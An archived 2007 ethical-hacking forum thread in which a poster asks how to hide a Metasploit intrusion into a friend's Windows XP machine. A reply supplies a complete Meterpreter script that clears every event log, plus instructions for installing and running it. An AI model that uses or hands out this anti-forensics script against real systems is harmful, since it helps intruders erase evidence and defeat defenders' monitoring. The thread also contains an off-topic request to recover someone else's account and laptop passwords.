HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 68 guests and 3 members online
EH-Net News Feeds
Latest Additions
 
Advertisement

You are here: Home arrow Forum arrow Ethical Hacking Discussions and Related Certificationsarrow Network Pen Testingarrow Beginning Pen Tester
EH-Net
May 24, 2012, 09:28:24 AM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Advertise on EH-Net!! - Reasonable Rates, Highly Targeted Audience.
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: Beginning Pen Tester  (Read 9237 times)
0 Members and 1 Guest are viewing this topic.
xXxKrisxXx
Sr. Member
****
Offline Offline

Posts: 491



View Profile
« on: December 23, 2007, 03:30:15 PM »
Sup Everyone?
Had a basic question or so was wondering if anyone could aim me in the right direction.
A buddy of mine and I have developed a small scheme to see which of us can access each other's computers first without any type of alarm triggering. I can bypass into his with his permission using an exploit in the Metasploit Framework however I'd like to be abit more stealthier. I dont have any custom scripts, but I was wondering, which files in a Windows Xp Machine should be deleted or cleared(Meaning Log Wise, Provide a path for me if you can) so when  he looks through his logs, he wouldnt be able to tell I was Any advice would help guys thanks, and Happy Holidays.
Logged
OSCP, OWSP, eCPPT
boney
Jr. Member
**
Offline Offline

Posts: 61



View Profile
« Reply #1 on: December 24, 2007, 10:54:10 AM »
Hi KrisTeason,
Well i dnt have enough expertise on Metasploit, but regarding the logs, i guess it comes under the DataStore system called as LogLevel. You bhave to manually enable ths feature. The log files are stored in the directory of the user’s configuration directory ( /.msf3/logs).
Hope that helps.

happy holidays  Smiley
Logged
C|EH

All my life I wanted a computer...
Now I want my life back !
Kev
Sr. Member
****
Offline Offline

Posts: 428


View Profile
« Reply #2 on: December 24, 2007, 02:50:43 PM »
If you are just talking about XP, then its rather simple. On your own machine check out the  Event Viewer by going to the control panel and then computer management. This will show you the normal default logging. Also check C:\WINDOWS\pfirewall.log for firewall logs, but this needs to have been activated by the user as do some of the other logging events in XP. The firewall log is activated under the advance tab once you click the firewall icon in the control panel.
Logged
xXxKrisxXx
Sr. Member
****
Offline Offline

Posts: 491



View Profile
« Reply #3 on: December 24, 2007, 04:03:23 PM »
Thanks for both your guys' responses. Thanks also to kev for providing that path to the firewall log. I was also wondering if there are anymore logs that could be cleare/deleted using the meterpreter, I'm trying to make sure my homie doesn't catch me here.
Logged
OSCP, OWSP, eCPPT
LSOChris
Guest
« Reply #4 on: December 24, 2007, 09:28:42 PM »
here's a meterpreter script to take care of it for you.

Quote
# clears ALL the event logs  - chris [] learnsecurityonline [] com
#
# Event 517 is logged whenever the Security log is cleared, REGARDLESS of
# the status of the Audit System Events audit policy.


print_line("Clearing the Security Event Log, it will leave a 517 event\n")
log = client.sys.eventlog.open('security')
log.clear

print_line("Clearing the System Event Log\n")
log = client.sys.eventlog.open('system')
log.clear

print_line("Clearing the Application Event Log\n")
log = client.sys.eventlog.open('application')
log.clear

print_line("Clearing the Directory Service Event Log (If It Exists)\n")
log = client.sys.eventlog.open('directory service')
log.clear

print_line("Clearing the DNS Server Event Log (If It Exists)\n")
log = client.sys.eventlog.open('dns server')
log.clear

print_line("Clearing the File Replication Service Event Log (If It Exists)\n")
log = client.sys.eventlog.open('file replication service')
log.clear

print_line("Done... Have a lovely day :-)")
Logged
xXxKrisxXx
Sr. Member
****
Offline Offline

Posts: 491



View Profile
« Reply #5 on: December 24, 2007, 09:38:12 PM »
Thanks Gates, All I Need To Do Is Learn How To Put This Script Into The MSF, it'd be useful for someone to aim me that way, if it's not too much trouble Cheesy
Logged
OSCP, OWSP, eCPPT
LSOChris
Guest
« Reply #6 on: December 25, 2007, 07:54:22 AM »
well since its christmas...

http://www.ethicalhacker.net/content/view/136/24/

the script goes into your scripts/meterpreter directroy.

so for me its:

cg@segfault:~/evil/msf3/scripts/meterpreter$ pwd

/home/cg/evil/msf3/scripts/meterpreter

once you get it in your scripts/meterpreter/ directory you can invoke the script by running it within your meterpreter shell.

meterpreter> run clearalllog


there are some videos on EH.net an LearnSecurityOnline.com if you need some more help

-Chris
Logged
xXxKrisxXx
Sr. Member
****
Offline Offline

Posts: 491



View Profile
« Reply #7 on: December 25, 2007, 02:13:54 PM »
Thanks man,
You all have a good christmas.  Grin
Logged
OSCP, OWSP, eCPPT
vital
Newbie
*
Offline Offline

Posts: 4



View Profile
« Reply #8 on: January 01, 2008, 02:36:50 AM »
Hello guyz,

How can i know my password if i forgot like in: yahoo account - all the details on my account was i forgotten,   how can i retrieve it again, then the next is how can i retrieved again my password on my laptop windows XP and vista, administrator.

tnx guyz

L30
Logged
proudindian
Newbie
*
Offline Offline

Posts: 32


View Profile
« Reply #9 on: January 01, 2008, 03:06:50 AM »
actually i dont think by metaexploit widout permission u cant break in2 his system.....Huh?am i rite??
Logged
LSOChris
Guest
« Reply #10 on: January 01, 2008, 07:11:03 AM »
Quote from: vital on January 01, 2008, 02:36:50 AM
Hello guyz,

How can i know my password if i forgot like in: yahoo account - all the details on my account was i forgotten,   how can i retrieve it again, then the next is how can i retrieved again my password on my laptop windows XP and vista, administrator.

tnx guyz

L30

i think you need to return that laptop to its rightful owner
Logged
don
Editor-In-Chief
Administrator
Hero Member
*****
Online Online

Posts: 3915


Editor-In-Chief


View Profile WWW
« Reply #11 on: January 01, 2008, 01:35:46 PM »
... and don't hijack a legitimate thread.

Don
Logged
CISSP, MCSE, CSTA, Security+ SME
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.16 | SMF © 2011, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.151 seconds with 24 queries.
 

gk_static-ad_feb2012.jpg
Global Knowledge: Build Security Skills to Protect & Defend

els_130x200fixed2.gif
eLearnSecurity Student Course Now Live!
5% Off with Code
ELS-EH-5

SANS Deals 4 EH-Netters
$150 OFF Any SANS Course in Any Format!
Coupon Code: EHN_Connect Including SANS Security West 2012 & SANSFIRE 2012
Recent Forum Topics

cbtnuggets_logo_125.jpg
Try CBT Nuggets Free!

Vote For EH-Net

Add to Technorati Favorites
technorati fave

 
         
Advertisement

© 2012 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.